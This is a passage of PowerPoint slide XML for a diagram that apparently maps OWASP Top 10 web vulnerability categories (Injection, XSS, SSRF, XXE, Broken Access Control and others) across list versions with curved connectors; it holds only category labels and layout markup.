            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238680" y="2212200"/>
            <a:ext cx="91296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Broken Auth. &amp; Session Mngt.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3" name="CustomShape 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB29A20C-EB90-2C1F-1720-0161D96770A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485360" y="221220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Malicious File Execution</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1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04" name="CustomShape 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76C9D24A-89EC-D607-B6D9-51717F1CC129}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2765880" y="2209320"/>
            <a:ext cx="9295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Broken Auth. &amp; Session Mngt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5" name="CustomShape 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DB3E4F0-754D-6FBE-8EE5-AC915D1E92FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5325840" y="2212200"/>
            <a:ext cx="9259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Sensitive Data Exposure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06" name="CustomShape 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6F9FE8A-0A14-08EE-F76C-A0C5F418FAA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038840" y="221220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07" name="CustomShape 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E193B39-7314-CBBC-711E-D27F59ADF6D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6593400" y="221220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08" name="CustomShape 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34B18850-6FF1-3481-18A3-D38224FAD0CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238680" y="270864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09" name="CustomShape 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B77E2533-8298-47C7-76A1-E4B12E755A5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485000" y="2703960"/>
            <a:ext cx="9313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0" name="CustomShape 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3ED82EE0-029F-4A0D-408F-E926BDBEDFA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2765880" y="2703960"/>
            <a:ext cx="9295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1" name="CustomShape 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6D6A2BE-043D-231D-5159-1C349161888B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038840" y="2708640"/>
            <a:ext cx="9277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IDOR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2" name="CustomShape 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D224F8F-4219-EC7E-979A-7890D3C2BEA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6593400" y="2708640"/>
            <a:ext cx="924480" cy="418680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="wdUpDiag">
            <a:fgClr>
              <a:srgbClr val="92D050"/>
            </a:fgClr>
            <a:bgClr>
              <a:srgbClr val="E4E4E4"/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Insecure </a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1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Design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3" name="CustomShape 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E16D9CED-8846-9A02-3EA5-85FA3C3F5CA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="239400" y="3204720"/>
            <a:ext cx="911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Buffer Overflows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14" name="CustomShape 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC8ABD92-0D7F-3E8C-C345-582C56FA2412}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485360" y="3204720"/>
            <a:ext cx="9313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5" name="CustomShape 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CD74C95-E95E-1B56-7158-D084DF5D8D51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2765880" y="3198600"/>
            <a:ext cx="9295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6" name="CustomShape 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B55064B5-C9E4-5837-0EEB-5F6064ECBB97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5325840" y="3204720"/>
            <a:ext cx="9259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Broken Access Control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17" name="CustomShape 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3494E3BF-07F4-87F5-632D-5E83E0AE1E0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238680" y="370080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Injection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18" name="CustomShape 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90354FA1-B198-C73F-2053-5ADD5DE5F877}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485720" y="3700800"/>
            <a:ext cx="93060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Info Leakage &amp; Improper Error Handling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19" name="CustomShape 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27A83812-6920-1E7A-B1C7-C8D345784EFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2765880" y="369324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0" name="CustomShape 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C871500-B37A-8C5F-9CEF-4DEBAA7CDD73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038840" y="3700800"/>
            <a:ext cx="9277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Sensitive Data Exposure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1" name="CustomShape 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6090700-2471-C77E-17F4-E766C6296CBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6593400" y="370080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Vulnerable &amp; outdated components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2" name="CustomShape 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19BE3881-77C8-5724-684B-77C745D2ADDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="216360" y="4196880"/>
            <a:ext cx="95724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Improper Error Handling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3" name="CustomShape 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA2D7A5D-82FB-524E-5468-87D97AB966C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485360" y="4196880"/>
            <a:ext cx="9313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Broken Auth. &amp; Session Mngt.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4" name="CustomShape 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10A388C0-BA0D-0E0D-B737-5D5AAB5438F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2766240" y="4187880"/>
            <a:ext cx="92916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Insecure Cryptographic Storage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5" name="CustomShape 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{393C49B9-7ECC-8FAD-2CAA-1DABC5CE3403}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5325840" y="419688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XSS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26" name="CustomShape 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8226B4EE-2A43-3300-24AC-C0FAB9803794}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038840" y="4196880"/>
            <a:ext cx="9277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Missing function level access control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7" name="CustomShape 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E9A4B09-BFED-A1F8-C8D9-A5F2254DDF1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6593400" y="4196880"/>
            <a:ext cx="92448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Identification &amp; Authentication Failures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8" name="CustomShape 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD35ED83-275F-07C4-7B39-13E7ECAEA3ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238680" y="4693320"/>
            <a:ext cx="91296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Insecure Storage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29" name="CustomShape 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAB2D0EB-151B-BB98-C4A6-8BD418948B34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485360" y="4693320"/>
            <a:ext cx="9313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Insecure Cryptographic Storage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30" name="CustomShape 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64227BD2-805A-B9AD-56B4-07E45E19BCF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2765880" y="4682520"/>
            <a:ext cx="9295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Failure to restrict URL access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31" name="CustomShape 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2A08360-06BF-BBC1-05BD-03C553D10DCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5325840" y="469332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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" strike="noStrike" spc="-1" dirty="0" err="1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Deserialisation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2" name="CustomShape 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA225171-216E-75FD-055C-60B51DF691CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21567600">
            <a:off x="238320" y="518940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Denial of Service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3" name="CustomShape 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04CF7C8D-570E-181F-3D98-118F62E24BE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485360" y="5189400"/>
            <a:ext cx="9313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Communication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4" name="CustomShape 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D796F450-3797-F221-DAF4-A86A3597A70B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2765880" y="5177160"/>
            <a:ext cx="9295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Transport Layer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5" name="CustomShape 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA77D4D7-0CF3-3E90-F954-9C710715205A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5325840" y="518940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Components with known vulnerabilities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6" name="CustomShape 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0ED2E12-0E7D-7262-4028-D724575C9577}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038840" y="5189400"/>
            <a:ext cx="9277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Components with known vulnerabilities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7" name="CustomShape 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE7F092B-7F37-22C8-3CBD-B9536908A12D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6593400" y="5189400"/>
            <a:ext cx="92448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Yu Mincho Demibold"/>
              </a:rPr>
              <a:t>Insufficient Logging &amp; Monitoring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38" name="CustomShape 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFCB107B-FE02-83F2-169A-8E53A95A1193}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238680" y="5685480"/>
            <a:ext cx="912960" cy="418680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCCCCC"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:solidFill>
              <a:srgbClr val="FFD8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Insecure Config.  Management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39" name="CustomShape 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69AE32B0-1BD6-5594-3938-8EEF33CD3863}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485360" y="5685480"/>
            <a:ext cx="9313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Failure to restrict URL access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0" name="CustomShape 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{540768DA-E4B4-8C21-31C9-76FE3672C51E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2765880" y="5671800"/>
            <a:ext cx="9295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dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Unvalidated Redirects and Forwards</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="9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1" name="CustomShape 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B6F5E50-5189-227D-216D-9B7823E38FE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5325840" y="5685480"/>
            <a:ext cx="9259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Insufficient Logging &amp; Monitoring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2" name="CustomShape 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07BE4F4B-F516-D91E-4191-49CD8B2EF6C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038840" y="5685480"/>
            <a:ext cx="9277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Unvalidated Redirects and Forwards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3" name="CustomShape 59">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70DB93F4-A6D3-F720-2F69-B4A5F855BE26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6593400" y="5685480"/>
            <a:ext cx="924480" cy="418680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="wdUpDiag">
            <a:fgClr>
              <a:srgbClr val="92D050"/>
            </a:fgClr>
            <a:bgClr>
              <a:srgbClr val="FFE575"/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SSRF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4" name="CustomShape 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A255C512-E3A4-E536-D9E9-B8F28FE2E8D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5339520" y="2711520"/>
            <a:ext cx="92592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XXE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45" name="CustomShape 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{385A1704-7A19-FB27-39D5-39F83ACCB363}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038120" y="320472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46" name="CustomShape 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B02E1104-C9D0-41AE-D668-A882B5B0553F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5339520" y="370080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47" name="CustomShape 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{329930E5-F448-3E5A-7EDA-9AE7E7993E6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6590880" y="3204720"/>
            <a:ext cx="92952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.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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1249" name="Connector: Curved 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C7360C6-60DC-5283-3D0C-AB1BF3F35ABE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1193" idx="3"/>
            <a:endCxn id="1207" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6251760" y="1429380"/>
            <a:ext cx="341640" cy="99216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50" name="Connector: Curved 73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{274A6559-EB37-7A1A-42E4-F5B2B11113C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="1206" idx="3"/>
            <a:endCxn id="1225" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4966560" y="2421360"/>
            <a:ext cx="359640" cy="1985040"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50100"/>
              <a:gd name="adj2" fmla="val 50009"/>
              <a:gd name="adj3" fmla="val 49899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51" name="Connector: Curved 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77E77B78-3C31-ABE9-6413-D4A591C99496}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1225" idx="3"/>
            <a:endCxn id="1207" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6251760" y="2421540"/>
            <a:ext cx="341640" cy="19846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sm" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1252" name="Connector: Curved 75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB58F18A-0304-CE00-7862-268AC72E10E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1198" idx="3"/>
            <a:endCxn id="1206" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3695400" y="1924020"/>
            <a:ext cx="343440" cy="49752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53" name="Connector: Curved 76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3774E556-1C0B-5FD2-38D7-607F196DE2CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1191" idx="3"/>
            <a:endCxn id="1198" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2416680" y="1429380"/>
            <a:ext cx="349200" cy="49464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54" name="Connector: Curved 77">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B1B2B0D-4B00-CE8E-DDA2-6149244CD948}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1229" idx="3"/>
            <a:endCxn id="1224" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2416680" y="4397220"/>
            <a:ext cx="349560" cy="50544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55" name="Connector: Curved 78">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DCD7CB6-5AD9-2355-3942-147B27B08DA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1239" idx="3"/>
            <a:endCxn id="1230" idx="1"/>
          </p:cNvCxnSpPr>
